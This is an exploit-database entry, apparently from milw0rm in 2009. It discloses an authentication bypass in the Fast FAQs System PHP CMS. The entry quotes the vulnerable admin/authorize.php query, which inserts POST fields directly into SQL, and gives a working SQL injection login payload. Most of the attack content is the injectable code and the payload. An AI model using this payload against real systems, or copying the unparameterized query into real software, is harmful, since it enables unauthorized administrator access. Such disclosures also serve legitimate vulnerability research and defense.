Fast FAQs System - Authentication Bypass

Author: x0r
type: webapps
platform: php
port: 
date_added: 2009-01-08 
date_updated:  
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

########################
# -=Fast FAQs System=- #
########################
Autore: x0r
Email: x0r@live.it
Cms Site: http://fastcreators.com/products/fast_faq/download.php
#########################

Bug In \admin\authorize.php

$query = "select * from admin where userid='{$_POST['uname']}' AND
pass='{$_POST['pass']}'";

Exploit:

' or '1=1

#######################

Greetz: Anna...Strabica...Emetta... Vi Amo..

-- w00t Zone - w00tzone.org

# milw0rm.com [2009-01-09]